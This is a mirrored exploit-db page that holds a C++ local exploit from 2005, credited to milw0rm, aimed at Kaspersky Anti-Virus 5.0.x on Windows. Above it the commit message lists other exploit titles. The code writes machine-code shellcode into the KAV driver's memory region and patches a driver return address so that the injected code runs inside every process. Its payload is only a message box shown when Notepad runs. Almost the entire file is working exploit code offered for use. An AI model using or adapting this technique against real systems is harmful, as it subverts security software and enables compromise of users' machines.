bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/local/1032.cpp
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

153 lines
3.9 KiB
C++
Executable file
Raw Blame History

/* Added NO_STRICT to 1 on line 2 /str0ke ! milw0rm.com */
#define NO_STRICT 1
#include <windows.h>
#undef STRICT
PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;
PDWORD pJmpAddress=(PDWORD)0xBE9372B0;
PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};
PUCHAR pKAVRet;
unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200
0x68,0x00,0x80,0x93,0xBE, //push <buffer address> - 0xBE938000
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<GetModuleFileNameA> -> +13
0xFF,0xD0, //call eax
0x68,0x00,0x80,0x93,0xBE, //push <buffer address>
0x68,0x00,0x82,0x93,0xBE, //push <address of the notepad path>- 0xBE938200
0xB8,0x00,0x00,0x00,0x00, //mov eax,<lstrcmpiA> -> +30
0xFF,0xD0, //call eax
0x85,0xC0, //test eax,eax
0x74,0x03, //je +03
0xC2,0x04,0x00, //retn 4
0x6A,0x00, //push 0
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<MessageBoxA> -> +58
0xFF,0xD0, //call eax
0xC2,0x04,0x00 //retn 4
};
unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt [0xBE9372B0]
//////////////////////////////////////////////////////////////
BOOLEAN LoadExploitIntoKernelMemory(void){
//Get function's addresses
HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
HANDLE hUser=GetModuleHandle("USER32.DLL");
FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");
FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");
*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
*(DWORD*)(code+30)=(DWORD)plstrcmpiA;
*(DWORD*)(code+58)=(DWORD)pMessageBoxA;
//Prepare our data into ring0-zone.
PCHAR pNotepadName=(PCHAR)0xBE938200;
char temp_buffer[MAX_PATH];
char *s;
SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
lstrcpy(pNotepadName,temp_buffer);
PCHAR pMessage=(PCHAR)0xBE938400;
lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");
memmove(pCodeBase,code,sizeof(code));
*pJmpAddress=(DWORD)pCodeBase;
memmove(pKAVRet,jmp_code,sizeof(jmp_code));
return TRUE;
}
///////////////////////////////////////////////////////////////
void UnloadExploitFromKernelMemory(){
UCHAR retn_4[]={0xC2,0x04,0x00};
memmove(pKAVRet,retn_4,sizeof(retn_4));
}
/////////////////////////////////////////////////////////////////
PUCHAR GetKAVRetAddress(void){
//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.
UCHAR retn_4[]={0xC2,0x04,0x00};
__try{
for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){
if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
return pKAVRets[i];
}
}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not installed",NULL,0);return NULL;}
MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of KAV",NULL,0);
return NULL;
}
/////////////////////////////////////////////////////////////////
void main(void){
pKAVRet=GetKAVRetAddress();
if(NULL==pKAVRet)
return;
if(!LoadExploitIntoKernelMemory())
return;
char temp_buffer[MAX_PATH];
char *s;
SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
PROCESS_INFORMATION pi;
STARTUPINFO si={0};
si.cb=sizeof(si);
CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
0,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);
MessageBox(NULL,"Now you may start your own Notepad instance to check this exploit!","KAV_EXPLOITER",0);
MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);
UnloadExploitFromKernelMemory();
}
// milw0rm.com [2005-06-07]
Reference in a new issue View git blame Copy permalink